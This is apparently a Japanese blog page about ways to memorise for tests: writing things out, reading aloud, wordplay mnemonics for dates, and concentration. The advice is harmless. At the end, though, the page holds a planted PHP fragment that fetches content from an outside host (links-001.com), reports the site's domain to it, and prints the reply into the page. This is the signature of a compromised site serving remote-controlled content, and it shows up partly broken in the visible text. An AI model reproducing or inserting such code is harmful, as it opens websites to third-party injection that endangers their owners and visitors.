前へ
次へ

暗記の方法を考えてみよう

暗記テストは苦手だったという人は多いかもしれません。しかし、コツさえつかめばこれほど楽なテストはありません。覚えたことをそのままテストに書けば満点をとれることもあります。まず、どんなふうに覚えればいいのか考えてみましょう。これは人によってやり方が異なります。書いて覚えるという人もいれば、ひたすら声に出して読んで覚えるという人もいることでしょう。どちらにしても、自身にとって覚えやすい方法を選択することをおすすめします。ちなみに私は書いて覚える派でした。声を出して覚える方法だと周りに迷惑をかけてしまうからです。書いていくうちに自然と頭に入る単語などがあります。書くという作業とともにその時に書いたことを思い出すことができるのです。このような暗記方法をやってみて自身に合うようならそのまま活かしてみましょう。書いたり読んだりする時間がもったいないという人もいます。もしくはそんな時間はとれないという人もいることでしょう。そのような場合には語呂合わせで覚えるというのもいいかもしれません。特に歴史の年号は語呂合わせで覚えた人も多いはずです。実際に語呂合わせで覚える方法はおすすめです。というのも、大人になってからも年月が経ってからもそのまま覚えていることが多いからです。自然と頭の中に残っています。語呂合わせは有名なものもありますが、自身で何かと合わせてみるというのもいいかもしれません。自身にとって覚えやすい語呂を考えてみましょう。年号や年月など、数字に関することは語呂合わせにした方が覚えやすいと言われています。他にもいろいろな方法があるので、すべて試してみましょう。その中に自身に合う方法が見つかるかもしれません。どんな方法をやってみても思うように暗記できないというのなら、それは単純に集中力がないからでしょう。人によっては追い込まれた方が覚えることもあります。試験ギリギリになったら必死で覚えられることもあるのです。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top